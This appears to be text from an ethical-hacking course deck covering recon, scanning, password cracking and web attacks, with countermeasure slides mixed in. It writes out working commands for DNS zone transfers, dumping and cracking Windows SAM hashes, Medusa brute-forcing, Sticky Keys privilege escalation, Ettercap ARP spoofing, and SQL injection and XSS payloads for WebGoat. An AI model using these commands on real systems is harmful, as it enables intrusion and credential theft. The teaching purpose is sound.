2. •First SSH need to be install/update
# apt-get install openssh-server
# service ssh start
Verify that the server is up and listening using the “netstat” command
#netstat -antp |grep ssh
Now connect with “putty.exe” to your SSH linux servers (Kali/ ubuntu / redhat /
centos)
SSHD | SSH Server
9. Active Recon Resources
•inurl:ftp "password" filetype:xls
•site:example.com inurl:ftp "password" filetype:xls
You should also be performing focused searches that locate all major document types
such as .pdf, .doc, .txt, .xls
10. Active Recon Resources
•dig (Domain Information Groper) Alternative to nslookup
# dig example.com
#dig +qr example.com any (find out their name servers)
Zone Transfer using DIG
# dig @ns1.example.com example.com axfr
Listing the DNS version (restrict by default by administrators)
#dig +nocmd txt chaos VERSION.BIND @ns1.example.com +noall +answer
Reverse DNS Lookup
#dig –x ipaddress
Tracing the Path
#dig +trace example.com
11. Active Recon Resources
•Fierce (DNS brute forcing with fierce)
Goto
# cd /pentest/enumeration/dns/fierce
# ./fierce –dns example.com
12. Active Recon Resources
•Metagofil (a powerful metadata gathering tool)
BackTrack has the Metagoofil Blackhat Arsenal Edition installed by default.
Open up a terminal and type the following:
# cd /pentest/enumeration/google/metagoofil
# ./metagoofil.py –h
#metagoofil.py -d example.com -t doc,pdf –l 200 -n 50 –o /mnt -f results.html
14. Countermeasures
•Trash Securely
•Router/IDS/Firewalls to allow only certain apps/ports/rules
•Refuse malicious traffic
•Lockdown ports & Protocols
•Web service info avoid to leakage
•Disallow sensitive directories
•Evaluate your services before posting on public
•Listen carefully and reply only limited and specific answers
16. •What is Scanning
•CEH Scanning Methodology
•Scanning Terms
•3-way handshake
Let’s Get Start into
17. • Port scanning is the process of checking for open TCP or UDP
ports on a remote machine. Please note that port scanning is illegal
in many countries and should not be performed outside the labs. This
is active probing or phase, which involves more direct interaction
with the target servers. It is vital that we understand the implications
of port scanning, as well as the impact that certain port scans can
have on a network.
•Scanning refers to a set of procedures for identifying hosts, ports
and services in a network
•Scanning is one step of intelligence gathering for an attacker to
create a profile of the target organization
What is Scanning
18. •Checking Live Systems
•Check Open Ports
•Banner Grabbing
•Prepare Proxies
•Scan for Vulnerabilities
•Draw Network Diagram
Scanning Methodology
26. •Configure firewall and IDS rules to detect and block probes/search
•Block unwanted ports at the firewall
•Hide sensitive information from public view
•Use custom rules set to lock down the network
•Filter inbound ICMP message types and all outbound ICMP type 3 unreachable
messages at boarder routers and firewalls
•Ensure that routing and filtering mechanisms cannot be bypassed using specific
source ports or source-routing techniques
•Understand the network configuration and its accessible ports by launching TCP
and UDP port scans along with ICMP probes against your own IP address space
Countermeasures
27. •If a commercial firewall is in use, ensure that:
•The latest service pack is installed
•The Anti-spoofing rules have been correctly defined
•Fastmode services are not used in Check Point Firewall-1 environment
Countermeasures
30. Enumeration is defined as the process of extracting user names, machine
names, network resources, shares, and services from a system
Enumeration techniques are conducted in a intranet (LAN) environment
The type of information enumerated by intruders:
Network resources and shares
Users and groups
Applications and banners
Auditing settings
What is Enumeration
34. •NetBIOS Enumeration : use strong password
•SNMP Enumeration: use SNMP v3 have encryption
•LDAP Enumeration: By default allow for everyone, restrict for
authorized only
Countermeasures
37. Password cracking techniques
Dictionary Attacks - A dictionary file a loaded into the cracking application
that runs against user accounts
Brute Forcing Attacks- The program tries every combination of characters
until the password is broken
Hybrid Attack – It works like a dictionary attacks, but adds some numbers and
symbols to the words from the dictionary and tries to crack the password
Syllable Attack – It is the combination of both brute force attack and the
dictionary attack
Rule-Based Attack – This attack is used when the attacker get some
information about the password
38. Understanding different types of passwords
Only letters - HIJKLMNO
Only numbers - 758904
Only special characters - $@$!0
Letters and numbers - ax15oog
Only letters and special characters - m@roon$
Only numbers and special characters - @#47$
Letters, numbers, and special characters - E1n$8$
41. Password Cracking Tools (2000 / XP / 2003 / Vista / 7 / 2008)
-Offline NT password re-setter
-Cain & Abel
-Ettercap (MITM) Back Track 5
-Pwdump6 / Fgdump (dump hashes)
-L0phtCrack (LC6)
-Ophcrack (rainbow tables) http://ophcrack.sourceforge.net
-Elcomsoft Advanced Password Recovery Bundle
-Back Track 5 – dump hashes and crack
42. Back Track 5 – Dump windows hashes and crack
1) Mount windows NTFS partition ( fdisk –l )
2) create temp folder
3) Mount windows HDD ( mount /dev/sda1 /mountfolder )
4) Bkhive /winhash/WINDOWS/system32/config/system syskey.txt
5) samdump2 /mnt/mountfolder/windows/system32/config/SAM syskey.txt >
hashes.txt
6) nano or vi editor to check the contents (optional)
7) john /hashfolder/hashes.txt -w:/dicfolder/wordfile.txt
Password cracked
43. Password cracking tools (2000 / XP / 2003 / Vista / 7 / 2008)
- THC-Hydra (back track 5)
-Medusa (back track 5)
# medusa -h 172.19.0.1 -u "admin" -P wordlist.txt -M http
-h the host you want to attack
-u the username you want to try. If there is no username use ""
-P the wordlist you want to use
-M the module you want to use
Here is the list of modules included with Back Track 5 & 5R1 Final:
# ls /usr/local/lib/medusa/modules/
44. Password cracking tools (2000 / XP / 2003 / Vista / 7 / 2008)
-John the Ripper
-Recover Keys
-Windows Password Crackers
-Proactive System Password Recovery
-Password Unlocker Bundle
-Windows Password Reset Professional
-Windows Password Reset Standard
-Windows Password Unlocker
-Win Password
-Passware Kit Enterprise
-RockXP
-Passwords Pro
-LSA Secret View
-LCP
45. Stealing Passwords Using USB Drive
Insert USB into victim’s computer and extract the necessary information
46. Microsoft Authentication
SAM Database: Windows stores users passwords in the Security Accounts Manager
database (SAM) or in the Active Directory database in domains. Passwords are never
stored in clear text passwords are hashed and the results are stored in the SAM
NTLM Authentication: The NTLM authentication protocol consists of two
authentication protocols. NTLM and LM authentication protocol. These protocols
use different hashing methods to securely store a user’s password in the SAM
database.
Kerberos: Microsoft has upgraded its default authentication protocol to Kerberos, a
considerably more secure option than NTLM
More info
http://en.wikipedia.org/w/index.php?title=Special%3ASearch&search=Ntlm+hash
48. Algorithms – well defined instructions for calculating the functions
Kerberos – (2003 / vista / 7 / 2008)
Greatest security works only on Active Directory 2003 and above
49. Microsoft Remote Desktop Service – BSoD a.k.a Crashing (XP, 2003, 7, 2008 R2)
Hands-on with - RDPKill
50. Password Cracking Countermeasures
-Strongest passwords should be implemented to protect against password
cracking.
-Systems should enforce 8–12-character alphanumeric passwords.
-Password length & complexity should be set
-To protect against cracking of the hashing algorithm for passwords stored on the
server, you must take care to physically isolate and protect the server.
-The system administrator can use the SYSKEY utility in Windows to further protect
hashes stored on the server’s hard disk.
-The server logs should also be monitored for brute-force attacks on user
accounts.
51. Password Cracking Countermeasures
System administrators can implement the following security precautions to decrease
the effectiveness of a brute-force password-cracking attempt:
-Never leave a default password.
-Never use a password that can be found in a dictionary.
-Never use a password related to the hostname, domain name, or anything else that
can be found with Whois.
-Never use a password related to your hobbies, pets, relatives, or date of birth.
-As a last resort, use a word that has more than 21 characters
-Passwords should expire after a certain amount of time so that users are forced to
change them.
52. Escalating Privileges
Escalating privileges basically means adding more rights or permissions to a user
account. Simply said, escalating privileges makes a regular user account into an
administrator account
53. Escalating Privileges
Sticky Keys – work on all windows
Sticky Keys is an accessibility features in Windows OS to aid users who have physical
disabilities. Press shift key 5 times at the logon screen and the sticky key dialog show
up
The program that launches the sticky keys is located at
c:windowssystem32sethc.exe
If we replace the sethc.exe with cmd.exe and then press 5 times shift key at logon
screen we will get a command prompt with admin privileges
54. How Defend against Privilege Escalation?
-User encryption techniques to protect sensitive data
-Restrict the interactive logon privilege
-Run users and applications on the least privilege
-Implement multi-factor authentication and authorization
-Patch the system regularly
-Run services as unprivileged accounts
55. Keyloggers
-Keystroke loggers are programs or hardware devices that monitor each keystroke as
user types on a keyboard, logs on to a file or transmits them to a remote location
-Keyloggers are placed between the keyboard hardware and the operating systems
-Legitimate applications for keyloggers include in office and industrial settings to
monitor employees computer activities and in home environments where parents
can monitor and spy on children's activity
57. Keyloggers
Actual Spy (monitoring systems)
www.actualspy.com
-Design for hidden computer monitoring
-Actual Spy is capable of catching all keystrokes, capturing the screen, logging the
programs being run and closed, and monitoring the clipboard contents
Features
-Log all keystrokes
-Makes screenshots within the specified time interval
-Saves the applications running and closing
-Watches clipboard contents
-Records all print activity
-Records disk changes
-Records internet connections
-Records all websites visited
61. How to hide files – NTFS Alternate Data Stream (ADS)
-NTFS Alternate Data Stream (ADS) is a windows hidden stream which contains
metadata for the files such as attributes, word count, author name, and access and
modification time of the file
-ADS is the ability to split data into existing files without changing or altering their
functionality, size, or display to the file browsing utilities
-ADS allows an attacker to inject malicious code on a breached system and executes
them without being detected by the user
62. How to hide files – NTFS Alternate Data Stream (ADS)
How to create
Notepad is stream compliant application
Launch c:notepad myfile.txt:private.txt
Click Yes to create the new file and write lines then save
View the file size
To modify the stream data, open file is quite similar like above
notepad myfile.txt:private.txt
63. Steganography Technologies
Image Steganography
In image Steganography, the information is hidden in image files of different formats
such as .PNG, .JPG, .BMP, etc.
Image Steganography tools replace redundant bits of image data with the message
in such a way that the effect can not be detected by human eyes
Download Images Steganography Tools
http://www.stegoarchive.com
Demo - Image Hide
67. Covering Your Tracks
-Once intruders have successfully gained administrator access on a system, they will
try to cover the tracks to avoid their detection
-When all the information of interest has been stripped off from the target, the
intruder installs several backdoors so that he or she can gain easy access in the
future
68. Covering Your Tracks
Why Cover Tracks?
-They can attack again
- They can cover the tracks to avoid their detection
- They can install backdoors to gain access in future
Tool:
CCleaner
69. Ettercap Packet Sniffing
Ettercap Packet Sniffing
ettercap -T -M arp -i eth0 /192.168.1.8/ /192.168.1.1/ (computer to router)
ettercap -T -M arp -i eth0 // // (all computers)
ettercap -T -M arp -i eth0 // // -w file.cap (all computers with save data in file)
q and ctrl+c to dc
cat test.cap | grep -a http
74. (1) Installing WebGoat and run
(2) Install Tamper Data addon in firefox
(3) Run Burpsuite
In OWASP>
Access control flaws > bypass a path based Access Control Scheme >
/../../../../conf/server.xml
Injection Flaws > string SQL injection
X’ or ‘a’=’a
Improper Error Handling
Parameter Tampering
OWASP – WebGoat
WebGoat OWASP Web/SQL/App Hacking Practitioner
75. CSS – Cross Site Script & SQL
Stored XSS
Stored XSS revisited
Reflected XSS (search staff)
"><script>alert("Teste")</script>
String SQL injection (Smith’ or ‘a’ = ‘a) with Temper Data